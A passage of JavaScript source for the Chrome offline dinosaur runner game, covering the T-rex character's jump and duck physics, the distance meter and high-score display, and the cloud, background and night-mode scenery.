   * - Minimum gap gets wider as speed increses
   * @param {number} gapCoefficient
   * @param {number} speed
   * @return {number} The gap size.
   */
  getGap(gapCoefficient, speed) {
    const minGap = Math.round(
        this.width * speed + this.typeConfig.minGap * gapCoefficient);
    const maxGap = Math.round(minGap * Obstacle.MAX_GAP_COEFFICIENT);
    return getRandomNum(minGap, maxGap);
  },

  /**
   * Check if obstacle is visible.
   * @return {boolean} Whether the obstacle is in the game area.
   */
  isVisible() {
    return this.xPos + this.width > 0;
  },

  /**
   * Make a copy of the collision boxes, since these will change based on
   * obstacle type and size.
   */
  cloneCollisionBoxes() {
    const collisionBoxes = this.typeConfig.collisionBoxes;

    for (let i = collisionBoxes.length - 1; i >= 0; i--) {
      this.collisionBoxes[i] = new CollisionBox(
          collisionBoxes[i].x, collisionBoxes[i].y, collisionBoxes[i].width,
          collisionBoxes[i].height);
    }
  },
};


//******************************************************************************
/**
 * T-rex game character.
 * @param {HTMLCanvasElement} canvas
 * @param {Object} spritePos Positioning within image sprite.
 * @constructor
 */
function Trex(canvas, spritePos) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.spritePos = spritePos;
  this.xPos = 0;
  this.yPos = 0;
  this.xInitialPos = 0;
  // Position when on the ground.
  this.groundYPos = 0;
  this.currentFrame = 0;
  this.currentAnimFrames = [];
  this.blinkDelay = 0;
  this.blinkCount = 0;
  this.animStartTime = 0;
  this.timer = 0;
  this.msPerFrame = 1000 / FPS;
  this.config = Object.assign(Trex.config, Trex.normalJumpConfig);
  // Current status.
  this.status = Trex.status.WAITING;
  this.jumping = false;
  this.ducking = false;
  this.jumpVelocity = 0;
  this.reachedMinHeight = false;
  this.speedDrop = false;
  this.jumpCount = 0;
  this.jumpspotX = 0;
  this.altGameModeEnabled = false;
  this.flashing = false;

  this.init();
}


/**
 * T-rex player config.
 */
Trex.config = {
  DROP_VELOCITY: -5,
  FLASH_OFF: 175,
  FLASH_ON: 100,
  HEIGHT: 47,
  HEIGHT_DUCK: 25,
  INTRO_DURATION: 1500,
  SPEED_DROP_COEFFICIENT: 3,
  SPRITE_WIDTH: 262,
  START_X_POS: 50,
  WIDTH: 44,
  WIDTH_DUCK: 59,
};

Trex.slowJumpConfig = {
  GRAVITY: 0.25,
  MAX_JUMP_HEIGHT: 50,
  MIN_JUMP_HEIGHT: 45,
  INITIAL_JUMP_VELOCITY: -20,
};

Trex.normalJumpConfig = {
  GRAVITY: 0.6,
  MAX_JUMP_HEIGHT: 30,
  MIN_JUMP_HEIGHT: 30,
  INITIAL_JUMP_VELOCITY: -10,
};

/**
 * Used in collision detection.
 * @enum {Array<CollisionBox>}
 */
Trex.collisionBoxes = {
  DUCKING: [new CollisionBox(1, 18, 55, 25)],
  RUNNING: [
    new CollisionBox(22, 0, 17, 16),
    new CollisionBox(1, 18, 30, 9),
    new CollisionBox(10, 35, 14, 8),
    new CollisionBox(1, 24, 29, 5),
    new CollisionBox(5, 30, 21, 4),
    new CollisionBox(9, 34, 15, 4),
  ],
};


/**
 * Animation states.
 * @enum {string}
 */
Trex.status = {
  CRASHED: 'CRASHED',
  DUCKING: 'DUCKING',
  JUMPING: 'JUMPING',
  RUNNING: 'RUNNING',
  WAITING: 'WAITING',
};

/**
 * Blinking coefficient.
 * @const
 */
Trex.BLINK_TIMING = 7000;


/**
 * Animation config for different states.
 * @enum {Object}
 */
Trex.animFrames = {
  WAITING: {
    frames: [44, 0],
    msPerFrame: 1000 / 3,
  },
  RUNNING: {
    frames: [88, 132],
    msPerFrame: 1000 / 12,
  },
  CRASHED: {
    frames: [220],
    msPerFrame: 1000 / 60,
  },
  JUMPING: {
    frames: [0],
    msPerFrame: 1000 / 60,
  },
  DUCKING: {
    frames: [264, 323],
    msPerFrame: 1000 / 8,
  },
};


Trex.prototype = {
  /**
   * T-rex player initaliser.
   * Sets the t-rex to blink at random intervals.
   */
  init() {
    this.groundYPos = Runner.defaultDimensions.HEIGHT - this.config.HEIGHT -
        Runner.config.BOTTOM_PAD;
    this.yPos = this.groundYPos;
    this.minJumpHeight = this.groundYPos - this.config.MIN_JUMP_HEIGHT;

    this.draw(0, 0);
    this.update(0, Trex.status.WAITING);
  },

  /**
   * Assign the appropriate jump parameters based on the game speed.
   */
  enableSlowConfig: function() {
    const jumpConfig =
        Runner.slowDown ? Trex.slowJumpConfig : Trex.normalJumpConfig;
    Trex.config = Object.assign(Trex.config, jumpConfig);

    this.adjustAltGameConfigForSlowSpeed();
  },

  /**
   * Enables the alternative game. Redefines the dino config.
   * @param {Object} spritePos New positioning within image sprite.
   */
  enableAltGameMode: function(spritePos) {
    this.altGameModeEnabled = true;
    this.spritePos = spritePos;
    const spriteDefinition = Runner.spriteDefinition['TREX'];

    // Update animation frames.
    Trex.animFrames.RUNNING.frames =
        [spriteDefinition.RUNNING_1.x, spriteDefinition.RUNNING_2.x];
    Trex.animFrames.CRASHED.frames = [spriteDefinition.CRASHED.x];

    if (typeof spriteDefinition.JUMPING.x == 'object') {
      Trex.animFrames.JUMPING.frames = spriteDefinition.JUMPING.x;
    } else {
      Trex.animFrames.JUMPING.frames = [spriteDefinition.JUMPING.x];
    }

    Trex.animFrames.DUCKING.frames =
        [spriteDefinition.RUNNING_1.x, spriteDefinition.RUNNING_2.x];

    // Update Trex config
    Trex.config.GRAVITY = spriteDefinition.GRAVITY || Trex.config.GRAVITY;
    Trex.config.HEIGHT = spriteDefinition.RUNNING_1.h,
    Trex.config.INITIAL_JUMP_VELOCITY = spriteDefinition.INITIAL_JUMP_VELOCITY;
    Trex.config.MAX_JUMP_HEIGHT = spriteDefinition.MAX_JUMP_HEIGHT;
    Trex.config.MIN_JUMP_HEIGHT = spriteDefinition.MIN_JUMP_HEIGHT;
    Trex.config.WIDTH = spriteDefinition.RUNNING_1.w;
    Trex.config.WIDTH_JUMP = spriteDefinition.JUMPING.w;
    Trex.config.INVERT_JUMP = spriteDefinition.INVERT_JUMP;

    this.adjustAltGameConfigForSlowSpeed(spriteDefinition.GRAVITY);
    this.config = Trex.config;

    // Adjust bottom horizon placement.
    this.groundYPos = Runner.defaultDimensions.HEIGHT - this.config.HEIGHT -
        Runner.spriteDefinition['BOTTOM_PAD'];
    this.yPos = this.groundYPos;
    this.reset();
  },

  /**
   * Slow speeds adjustments for the alt game modes.
   * @param {number=} opt_gravityValue
   */
  adjustAltGameConfigForSlowSpeed: function(opt_gravityValue) {
    if (Runner.slowDown) {
      if (opt_gravityValue) {
        Trex.config.GRAVITY = opt_gravityValue / 1.5;
      }
      Trex.config.MIN_JUMP_HEIGHT *= 1.5;
      Trex.config.MAX_JUMP_HEIGHT *= 1.5;
      Trex.config.INITIAL_JUMP_VELOCITY =
          Trex.config.INITIAL_JUMP_VELOCITY * 1.5;
    }
  },

  /**
   * Setter whether dino is flashing.
   * @param {boolean} status
   */
  setFlashing: function(status) {
    this.flashing = status;
  },

  /**
   * Setter for the jump velocity.
   * The approriate drop velocity is also set.
   * @param {number} setting
   */
  setJumpVelocity(setting) {
    this.config.INITIAL_JUMP_VELOCITY = -setting;
    this.config.DROP_VELOCITY = -setting / 2;
  },

  /**
   * Set the animation status.
   * @param {!number} deltaTime
   * @param {Trex.status=} opt_status Optional status to switch to.
   */
  update(deltaTime, opt_status) {
    this.timer += deltaTime;

    // Update the status.
    if (opt_status) {
      this.status = opt_status;
      this.currentFrame = 0;
      this.msPerFrame = Trex.animFrames[opt_status].msPerFrame;
      this.currentAnimFrames = Trex.animFrames[opt_status].frames;

      if (opt_status === Trex.status.WAITING) {
        this.animStartTime = getTimeStamp();
        this.setBlinkDelay();
      }
    }
    // Game intro animation, T-rex moves in from the left.
    if (this.playingIntro && this.xPos < this.config.START_X_POS) {
      this.xPos += Math.round((this.config.START_X_POS /
          this.config.INTRO_DURATION) * deltaTime);
      this.xInitialPos = this.xPos;
    }

    if (this.status === Trex.status.WAITING) {
      this.blink(getTimeStamp());
    } else {
      this.draw(this.currentAnimFrames[this.currentFrame], 0);
    }

    // Update the frame position.
    if (!this.flashing && this.timer >= this.msPerFrame) {
      this.currentFrame = this.currentFrame ==
          this.currentAnimFrames.length - 1 ? 0 : this.currentFrame + 1;
      this.timer = 0;
    }

    if (!this.altGameModeEnabled) {
      // Speed drop becomes duck if the down key is still being pressed.
      if (this.speedDrop && this.yPos === this.groundYPos) {
        this.speedDrop = false;
        this.setDuck(true);
      }
    }
  },

  /**
   * Draw the t-rex to a particular position.
   * @param {number} x
   * @param {number} y
   */
  draw(x, y) {
    let sourceX = x;
    let sourceY = y;
    let sourceWidth = this.ducking && this.status !== Trex.status.CRASHED ?
        this.config.WIDTH_DUCK :
        this.config.WIDTH;
    let sourceHeight = this.config.HEIGHT;
    const outputHeight = sourceHeight;

    let jumpOffset = Runner.spriteDefinition.TREX.JUMPING.xOffset;

    // Width of sprite changes on jump.
    if (this.altGameModeEnabled && this.jumping &&
        this.status !== Trex.status.CRASHED) {
      sourceWidth = this.config.WIDTH_JUMP;
    }

    if (IS_HIDPI) {
      sourceX *= 2;
      sourceY *= 2;
      sourceWidth *= 2;
      sourceHeight *= 2;
      jumpOffset *= 2;
    }

    // Adjustments for sprite sheet position.
    sourceX += this.spritePos.x;
    sourceY += this.spritePos.y;

    // Flashing.
    if (this.flashing) {
      if (this.timer < this.config.FLASH_ON) {
        this.canvasCtx.globalAlpha = 0.5;
      } else if (this.timer > this.config.FLASH_OFF) {
        this.timer = 0;
      }
    }

    // Ducking.
    if (!this.altGameModeEnabled && this.ducking &&
        this.status !== Trex.status.CRASHED) {
      this.canvasCtx.drawImage(Runner.imageSprite, sourceX, sourceY,
          sourceWidth, sourceHeight,
          this.xPos, this.yPos,
          this.config.WIDTH_DUCK, outputHeight);
    } else if (
        this.altGameModeEnabled && this.jumping &&
        this.status !== Trex.status.CRASHED) {
      // Jumping with adjustments.
      this.canvasCtx.drawImage(
          Runner.imageSprite, sourceX, sourceY, sourceWidth, sourceHeight,
          this.xPos - jumpOffset, this.yPos, this.config.WIDTH_JUMP,
          outputHeight);
    } else {
      // Crashed whilst ducking. Trex is standing up so needs adjustment.
      if (this.ducking && this.status === Trex.status.CRASHED) {
        this.xPos++;
      }
      // Standing / running
      this.canvasCtx.drawImage(Runner.imageSprite, sourceX, sourceY,
          sourceWidth, sourceHeight,
          this.xPos, this.yPos,
          this.config.WIDTH, outputHeight);
    }
    this.canvasCtx.globalAlpha = 1;
  },

  /**
   * Sets a random time for the blink to happen.
   */
  setBlinkDelay() {
    this.blinkDelay = Math.ceil(Math.random() * Trex.BLINK_TIMING);
  },

  /**
   * Make t-rex blink at random intervals.
   * @param {number} time Current time in milliseconds.
   */
  blink(time) {
    const deltaTime = time - this.animStartTime;

    if (deltaTime >= this.blinkDelay) {
      this.draw(this.currentAnimFrames[this.currentFrame], 0);

      if (this.currentFrame === 1) {
        // Set new random delay to blink.
        this.setBlinkDelay();
        this.animStartTime = time;
        this.blinkCount++;
      }
    }
  },

  /**
   * Initialise a jump.
   * @param {number} speed
   */
  startJump(speed) {
    if (!this.jumping) {
      this.update(0, Trex.status.JUMPING);
      // Tweak the jump velocity based on the speed.
      this.jumpVelocity = this.config.INITIAL_JUMP_VELOCITY - (speed / 10);
      this.jumping = true;
      this.reachedMinHeight = false;
      this.speedDrop = false;

      if (this.config.INVERT_JUMP) {
        this.minJumpHeight = this.groundYPos + this.config.MIN_JUMP_HEIGHT;
      }
    }
  },

  /**
   * Jump is complete, falling down.
   */
  endJump() {
    if (this.reachedMinHeight &&
        this.jumpVelocity < this.config.DROP_VELOCITY) {
      this.jumpVelocity = this.config.DROP_VELOCITY;
    }
  },

  /**
   * Update frame for a jump.
   * @param {number} deltaTime
   */
  updateJump(deltaTime) {
    const msPerFrame = Trex.animFrames[this.status].msPerFrame;
    const framesElapsed = deltaTime / msPerFrame;

    // Speed drop makes Trex fall faster.
    if (this.speedDrop) {
      this.yPos += Math.round(this.jumpVelocity *
          this.config.SPEED_DROP_COEFFICIENT * framesElapsed);
    } else if (this.config.INVERT_JUMP) {
      this.yPos -= Math.round(this.jumpVelocity * framesElapsed);
    } else {
      this.yPos += Math.round(this.jumpVelocity * framesElapsed);
    }

    this.jumpVelocity += this.config.GRAVITY * framesElapsed;

    // Minimum height has been reached.
    if (this.config.INVERT_JUMP && (this.yPos > this.minJumpHeight) ||
        !this.config.INVERT_JUMP && (this.yPos < this.minJumpHeight) ||
        this.speedDrop) {
      this.reachedMinHeight = true;
    }

    // Reached max height.
    if (this.config.INVERT_JUMP && (this.yPos > -this.config.MAX_JUMP_HEIGHT) ||
        !this.config.INVERT_JUMP && (this.yPos < this.config.MAX_JUMP_HEIGHT) ||
        this.speedDrop) {
      this.endJump();
    }

    // Back down at ground level. Jump completed.
    if ((this.config.INVERT_JUMP && this.yPos) < this.groundYPos ||
        (!this.config.INVERT_JUMP && this.yPos) > this.groundYPos) {
      this.reset();
      this.jumpCount++;

      if (Runner.audioCues) {
        Runner.generatedSoundFx.loopFootSteps();
      }
    }
  },

  /**
   * Set the speed drop. Immediately cancels the current jump.
   */
  setSpeedDrop() {
    this.speedDrop = true;
    this.jumpVelocity = 1;
  },

  /**
   * @param {boolean} isDucking
   */
  setDuck(isDucking) {
    if (isDucking && this.status !== Trex.status.DUCKING) {
      this.update(0, Trex.status.DUCKING);
      this.ducking = true;
    } else if (this.status === Trex.status.DUCKING) {
      this.update(0, Trex.status.RUNNING);
      this.ducking = false;
    }
  },

  /**
   * Reset the t-rex to running at start of game.
   */
  reset() {
    this.xPos = this.xInitialPos;
    this.yPos = this.groundYPos;
    this.jumpVelocity = 0;
    this.jumping = false;
    this.ducking = false;
    this.update(0, Trex.status.RUNNING);
    this.midair = false;
    this.speedDrop = false;
    this.jumpCount = 0;
  },
};


//******************************************************************************

/**
 * Handles displaying the distance meter.
 * @param {!HTMLCanvasElement} canvas
 * @param {Object} spritePos Image position in sprite.
 * @param {number} canvasWidth
 * @constructor
 */
function DistanceMeter(canvas, spritePos, canvasWidth) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.image = Runner.imageSprite;
  this.spritePos = spritePos;
  this.x = 0;
  this.y = 5;

  this.currentDistance = 0;
  this.maxScore = 0;
  this.highScore = '0';
  this.container = null;

  this.digits = [];
  this.achievement = false;
  this.defaultString = '';
  this.flashTimer = 0;
  this.flashIterations = 0;
  this.invertTrigger = false;
  this.flashingRafId = null;
  this.highScoreBounds = {};
  this.highScoreFlashing = false;

  this.config = DistanceMeter.config;
  this.maxScoreUnits = this.config.MAX_DISTANCE_UNITS;
  this.canvasWidth = canvasWidth;
  this.init(canvasWidth);
}


/**
 * @enum {number}
 */
DistanceMeter.dimensions = {
  WIDTH: 10,
  HEIGHT: 13,
  DEST_WIDTH: 11,
};


/**
 * Y positioning of the digits in the sprite sheet.
 * X position is always 0.
 * @type {Array<number>}
 */
DistanceMeter.yPos = [0, 13, 27, 40, 53, 67, 80, 93, 107, 120];


/**
 * Distance meter config.
 * @enum {number}
 */
DistanceMeter.config = {
  // Number of digits.
  MAX_DISTANCE_UNITS: 5,

  // Distance that causes achievement animation.
  ACHIEVEMENT_DISTANCE: 100,

  // Used for conversion from pixel distance to a scaled unit.
  COEFFICIENT: 0.025,

  // Flash duration in milliseconds.
  FLASH_DURATION: 1000 / 4,

  // Flash iterations for achievement animation.
  FLASH_ITERATIONS: 3,

  // Padding around the high score hit area.
  HIGH_SCORE_HIT_AREA_PADDING: 4,
};


DistanceMeter.prototype = {
  /**
   * Initialise the distance meter to '00000'.
   * @param {number} width Canvas width in px.
   */
  init(width) {
    let maxDistanceStr = '';

    this.calcXPos(width);
    this.maxScore = this.maxScoreUnits;
    for (let i = 0; i < this.maxScoreUnits; i++) {
      this.draw(i, 0);
      this.defaultString += '0';
      maxDistanceStr += '9';
    }

    this.maxScore = parseInt(maxDistanceStr, 10);
  },

  /**
   * Calculate the xPos in the canvas.
   * @param {number} canvasWidth
   */
  calcXPos(canvasWidth) {
    this.x = canvasWidth - (DistanceMeter.dimensions.DEST_WIDTH *
        (this.maxScoreUnits + 1));
  },

  /**
   * Draw a digit to canvas.
   * @param {number} digitPos Position of the digit.
   * @param {number} value Digit value 0-9.
   * @param {boolean=} opt_highScore Whether drawing the high score.
   */
  draw(digitPos, value, opt_highScore) {
    let sourceWidth = DistanceMeter.dimensions.WIDTH;
    let sourceHeight = DistanceMeter.dimensions.HEIGHT;
    let sourceX = DistanceMeter.dimensions.WIDTH * value;
    let sourceY = 0;

    const targetX = digitPos * DistanceMeter.dimensions.DEST_WIDTH;
    const targetY = this.y;
    const targetWidth = DistanceMeter.dimensions.WIDTH;
    const targetHeight = DistanceMeter.dimensions.HEIGHT;

    // For high DPI we 2x source values.
    if (IS_HIDPI) {
      sourceWidth *= 2;
      sourceHeight *= 2;
      sourceX *= 2;
    }

    sourceX += this.spritePos.x;
    sourceY += this.spritePos.y;

    this.canvasCtx.save();

    if (IS_RTL) {
      if (opt_highScore) {
        this.canvasCtx.translate(
            this.canvasWidth -
                (DistanceMeter.dimensions.WIDTH * (this.maxScoreUnits + 3)),
            this.y);
      } else {
        this.canvasCtx.translate(
            this.canvasWidth - DistanceMeter.dimensions.WIDTH, this.y);
      }
      this.canvasCtx.scale(-1, 1);
    } else {
      const highScoreX =
          this.x - (this.maxScoreUnits * 2) * DistanceMeter.dimensions.WIDTH;
      if (opt_highScore) {
        this.canvasCtx.translate(highScoreX, this.y);
      } else {
        this.canvasCtx.translate(this.x, this.y);
      }
    }

    this.canvasCtx.drawImage(
        this.image,
        sourceX,
        sourceY,
        sourceWidth,
        sourceHeight,
        targetX,
        targetY,
        targetWidth,
        targetHeight,
    );

    this.canvasCtx.restore();
  },

  /**
   * Covert pixel distance to a 'real' distance.
   * @param {number} distance Pixel distance ran.
   * @return {number} The 'real' distance ran.
   */
  getActualDistance(distance) {
    return distance ? Math.round(distance * this.config.COEFFICIENT) : 0;
  },

  /**
   * Update the distance meter.
   * @param {number} distance
   * @param {number} deltaTime
   * @return {boolean} Whether the acheivement sound fx should be played.
   */
  update(deltaTime, distance) {
    let paint = true;
    let playSound = false;

    if (!this.achievement) {
      distance = this.getActualDistance(distance);
      // Score has gone beyond the initial digit count.
      if (distance > this.maxScore && this.maxScoreUnits ==
        this.config.MAX_DISTANCE_UNITS) {
        this.maxScoreUnits++;
        this.maxScore = parseInt(this.maxScore + '9', 10);
      } else {
        this.distance = 0;
      }

      if (distance > 0) {
        // Achievement unlocked.
        if (distance % this.config.ACHIEVEMENT_DISTANCE === 0) {
          // Flash score and play sound.
          this.achievement = true;
          this.flashTimer = 0;
          playSound = true;
        }

        // Create a string representation of the distance with leading 0.
        const distanceStr = (this.defaultString +
            distance).substr(-this.maxScoreUnits);
        this.digits = distanceStr.split('');
      } else {
        this.digits = this.defaultString.split('');
      }
    } else {
      // Control flashing of the score on reaching acheivement.
      if (this.flashIterations <= this.config.FLASH_ITERATIONS) {
        this.flashTimer += deltaTime;

        if (this.flashTimer < this.config.FLASH_DURATION) {
          paint = false;
        } else if (this.flashTimer > this.config.FLASH_DURATION * 2) {
          this.flashTimer = 0;
          this.flashIterations++;
        }
      } else {
        this.achievement = false;
        this.flashIterations = 0;
        this.flashTimer = 0;
      }
    }

    // Draw the digits if not flashing.
    if (paint) {
      for (let i = this.digits.length - 1; i >= 0; i--) {
        this.draw(i, parseInt(this.digits[i], 10));
      }
    }

    this.drawHighScore();
    return playSound;
  },

  /**
   * Draw the high score.
   */
  drawHighScore() {
    if (parseInt(this.highScore, 10) > 0) {
      this.canvasCtx.save();
      this.canvasCtx.globalAlpha = .8;
      for (let i = this.highScore.length - 1; i >= 0; i--) {
        this.draw(i, parseInt(this.highScore[i], 10), true);
      }
      this.canvasCtx.restore();
    }
  },

  /**
   * Set the highscore as a array string.
   * Position of char in the sprite: H - 10, I - 11.
   * @param {number} distance Distance ran in pixels.
   */
  setHighScore(distance) {
    distance = this.getActualDistance(distance);
    const highScoreStr = (this.defaultString +
        distance).substr(-this.maxScoreUnits);

    this.highScore = ['10', '11', ''].concat(highScoreStr.split(''));
  },


  /**
   * Whether a clicked is in the high score area.
   * @param {Event} e Event object.
   * @return {boolean} Whether the click was in the high score bounds.
   */
  hasClickedOnHighScore(e) {
    let x = 0;
    let y = 0;

    if (e.touches) {
      // Bounds for touch differ from pointer.
      const canvasBounds = this.canvas.getBoundingClientRect();
      x = e.touches[0].clientX - canvasBounds.left;
      y = e.touches[0].clientY - canvasBounds.top;
    } else {
      x = e.offsetX;
      y = e.offsetY;
    }

    this.highScoreBounds = this.getHighScoreBounds();
    return x >= this.highScoreBounds.x && x <=
        this.highScoreBounds.x + this.highScoreBounds.width &&
        y >= this.highScoreBounds.y && y <=
        this.highScoreBounds.y + this.highScoreBounds.height;
  },

  /**
   * Get the bounding box for the high score.
   * @return {Object} Object with x, y, width and height properties.
   */
  getHighScoreBounds() {
    return {
      x: (this.x - (this.maxScoreUnits * 2) * DistanceMeter.dimensions.WIDTH) -
          DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING,
      y: this.y,
      width: DistanceMeter.dimensions.WIDTH * (this.highScore.length + 1) +
          DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING,
      height: DistanceMeter.dimensions.HEIGHT +
          (DistanceMeter.config.HIGH_SCORE_HIT_AREA_PADDING * 2),
    };
  },

  /**
   * Animate flashing the high score to indicate ready for resetting.
   * The flashing stops following this.config.FLASH_ITERATIONS x 2 flashes.
   */
  flashHighScore() {
    const now = getTimeStamp();
    const deltaTime = now - (this.frameTimeStamp || now);
    let paint = true;
    this.frameTimeStamp = now;

    // Reached the max number of flashes.
    if (this.flashIterations > this.config.FLASH_ITERATIONS * 2) {
      this.cancelHighScoreFlashing();
      return;
    }

    this.flashTimer += deltaTime;

    if (this.flashTimer < this.config.FLASH_DURATION) {
      paint = false;
    } else if (this.flashTimer > this.config.FLASH_DURATION * 2) {
      this.flashTimer = 0;
      this.flashIterations++;
    }

    if (paint) {
      this.drawHighScore();
    } else {
      this.clearHighScoreBounds();
    }
    // Frame update.
    this.flashingRafId =
        requestAnimationFrame(this.flashHighScore.bind(this));
  },

  /**
   * Draw empty rectangle over high score.
   */
  clearHighScoreBounds() {
    this.canvasCtx.save();
    this.canvasCtx.fillStyle = '#fff';
    this.canvasCtx.rect(this.highScoreBounds.x, this.highScoreBounds.y,
        this.highScoreBounds.width, this.highScoreBounds.height);
    this.canvasCtx.fill();
    this.canvasCtx.restore();
  },

  /**
   * Starts the flashing of the high score.
   */
  startHighScoreFlashing() {
    this.highScoreFlashing = true;
    this.flashHighScore();
  },

  /**
   * Whether high score is flashing.
   * @return {boolean}
   */
  isHighScoreFlashing() {
    return this.highScoreFlashing;
  },

  /**
   * Stop flashing the high score.
   */
  cancelHighScoreFlashing() {
    if (this.flashingRafId) {
      cancelAnimationFrame(this.flashingRafId);
    }
    this.flashIterations = 0;
    this.flashTimer = 0;
    this.highScoreFlashing = false;
    this.clearHighScoreBounds();
    this.drawHighScore();
  },

  /**
   * Clear the high score.
   */
  resetHighScore() {
    this.setHighScore(0);
    this.cancelHighScoreFlashing();
  },

  /**
   * Reset the distance meter back to '00000'.
   */
  reset() {
    this.update(0, 0);
    this.achievement = false;
  },
};


//******************************************************************************

/**
 * Cloud background item.
 * Similar to an obstacle object but without collision boxes.
 * @param {HTMLCanvasElement} canvas Canvas element.
 * @param {Object} spritePos Position of image in sprite.
 * @param {number} containerWidth
 * @constructor
 */
function Cloud(canvas, spritePos, containerWidth) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
  this.spritePos = spritePos;
  this.containerWidth = containerWidth;
  this.xPos = containerWidth;
  this.yPos = 0;
  this.remove = false;
  this.gap =
      getRandomNum(Cloud.config.MIN_CLOUD_GAP, Cloud.config.MAX_CLOUD_GAP);

  this.init();
}


/**
 * Cloud object config.
 * @enum {number}
 */
Cloud.config = {
  HEIGHT: 14,
  MAX_CLOUD_GAP: 400,
  MAX_SKY_LEVEL: 30,
  MIN_CLOUD_GAP: 100,
  MIN_SKY_LEVEL: 71,
  WIDTH: 46,
};


Cloud.prototype = {
  /**
   * Initialise the cloud. Sets the Cloud height.
   */
  init() {
    this.yPos = getRandomNum(Cloud.config.MAX_SKY_LEVEL,
        Cloud.config.MIN_SKY_LEVEL);
    this.draw();
  },

  /**
   * Draw the cloud.
   */
  draw() {
    this.canvasCtx.save();
    let sourceWidth = Cloud.config.WIDTH;
    let sourceHeight = Cloud.config.HEIGHT;
    const outputWidth = sourceWidth;
    const outputHeight = sourceHeight;
    if (IS_HIDPI) {
      sourceWidth = sourceWidth * 2;
      sourceHeight = sourceHeight * 2;
    }

    this.canvasCtx.drawImage(Runner.imageSprite, this.spritePos.x,
        this.spritePos.y,
        sourceWidth, sourceHeight,
        this.xPos, this.yPos,
        outputWidth, outputHeight);

    this.canvasCtx.restore();
  },

  /**
   * Update the cloud position.
   * @param {number} speed
   */
  update(speed) {
    if (!this.remove) {
      this.xPos -= Math.ceil(speed);
      this.draw();

      // Mark as removeable if no longer in the canvas.
      if (!this.isVisible()) {
        this.remove = true;
      }
    }
  },

  /**
   * Check if the cloud is visible on the stage.
   * @return {boolean}
   */
  isVisible() {
    return this.xPos + Cloud.config.WIDTH > 0;
  },
};


/**
 * Background item.
 * Similar to cloud, without random y position.
 * @param {HTMLCanvasElement} canvas Canvas element.
 * @param {Object} spritePos Position of image in sprite.
 * @param {number} containerWidth
 * @param {string} type Element type.
 * @constructor
 */
function BackgroundEl(canvas, spritePos, containerWidth, type) {
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (this.canvas.getContext('2d'));
  this.spritePos = spritePos;
  this.containerWidth = containerWidth;
  this.xPos = containerWidth;
  this.yPos = 0;
  this.remove = false;
  this.type = type;
  this.gap =
      getRandomNum(BackgroundEl.config.MIN_GAP, BackgroundEl.config.MAX_GAP);
  this.animTimer = 0;
  this.switchFrames = false;

  this.spriteConfig = {};
  this.init();
}

/**
 * Background element object config.
 * Real values assigned when game type changes.
 * @enum {number}
 */
BackgroundEl.config = {
  MAX_BG_ELS: 0,
  MAX_GAP: 0,
  MIN_GAP: 0,
  POS: 0,
  SPEED: 0,
  Y_POS: 0,
  MS_PER_FRAME: 0,  // only needed when BACKGROUND_EL.FIXED is true
};


BackgroundEl.prototype = {
  /**
   * Initialise the element setting the y position.
   */
  init() {
    this.spriteConfig = Runner.spriteDefinition.BACKGROUND_EL[this.type];
    if (this.spriteConfig.FIXED) {
      this.xPos = this.spriteConfig.FIXED_X_POS;
    }
    this.yPos = BackgroundEl.config.Y_POS - this.spriteConfig.HEIGHT +
        this.spriteConfig.OFFSET;
    this.draw();
  },

  /**
   * Draw the element.
   */
  draw() {
    this.canvasCtx.save();
    let sourceWidth = this.spriteConfig.WIDTH;
    let sourceHeight = this.spriteConfig.HEIGHT;
    let sourceX = this.spriteConfig.X_POS;
    const outputWidth = sourceWidth;
    const outputHeight = sourceHeight;

    if (IS_HIDPI) {
      sourceWidth *= 2;
      sourceHeight *= 2;
      sourceX *= 2;
    }

    this.canvasCtx.drawImage(
        Runner.imageSprite, sourceX, this.spritePos.y, sourceWidth,
        sourceHeight, this.xPos, this.yPos, outputWidth, outputHeight);

    this.canvasCtx.restore();
  },

  /**
   * Update the background element position.
   * @param {number} speed
   */
  update(speed) {
    if (!this.remove) {
      if (this.spriteConfig.FIXED) {
        this.animTimer += speed;
        if (this.animTimer > BackgroundEl.config.MS_PER_FRAME) {
          this.animTimer = 0;
          this.switchFrames = !this.switchFrames;
        }

        if (this.spriteConfig.FIXED_Y_POS_1 &&
            this.spriteConfig.FIXED_Y_POS_2) {
          this.yPos = this.switchFrames ? this.spriteConfig.FIXED_Y_POS_1 :
                                          this.spriteConfig.FIXED_Y_POS_2;
        }
      } else {
        // Fixed speed, regardless of actual game speed.
        this.xPos -= BackgroundEl.config.SPEED;
      }
      this.draw();

      // Mark as removable if no longer in the canvas.
      if (!this.isVisible()) {
        this.remove = true;
      }
    }
  },

  /**
   * Check if the element is visible on the stage.
   * @return {boolean}
   */
  isVisible() {
    return this.xPos + this.spriteConfig.WIDTH > 0;
  },
};



//******************************************************************************

/**
 * Nightmode shows a moon and stars on the horizon.
 * @param {HTMLCanvasElement} canvas
 * @param {number} spritePos
 * @param {number} containerWidth
 * @constructor
 */
function NightMode(canvas, spritePos, containerWidth) {
  this.spritePos = spritePos;
  this.canvas = canvas;
  this.canvasCtx =
      /** @type {CanvasRenderingContext2D} */ (canvas.getContext('2d'));
  this.xPos = containerWidth - 50;
  this.yPos = 30;
  this.currentPhase = 0;
  this.opacity = 0;
  this.containerWidth = containerWidth;
  this.stars = [];
  this.drawStars = false;
  this.placeStars();
}

/**
 * @enum {number}
 */
NightMode.config = {
  FADE_SPEED: 0.035,
  HEIGHT: 40,
  MOON_SPEED: 0.25,
  NUM_STARS: 2,
  STAR_SIZE: 9,
  STAR_SPEED: 0.3,
  STAR_MAX_Y: 70,
  WIDTH: 20,
};

NightMode.phases = [140, 120, 100, 60, 40, 20, 0];

NightMode.prototype = {
  /**
   * Update moving moon, changing phases.
   * @param {boolean} activated Whether night mode is activated.
   */
  update(activated) {
    // Moon phase.
    if (activated && this.opacity === 0) {
      this.currentPhase++;

      if (this.currentPhase >= NightMode.phases.length) {
        this.currentPhase = 0;
      }
    }

    // Fade in / out.
    if (activated && (this.opacity < 1 || this.opacity === 0)) {
      this.opacity += NightMode.config.FADE_SPEED;
    } else if (this.opacity > 0) {
      this.opacity -= NightMode.config.FADE_SPEED;
    }

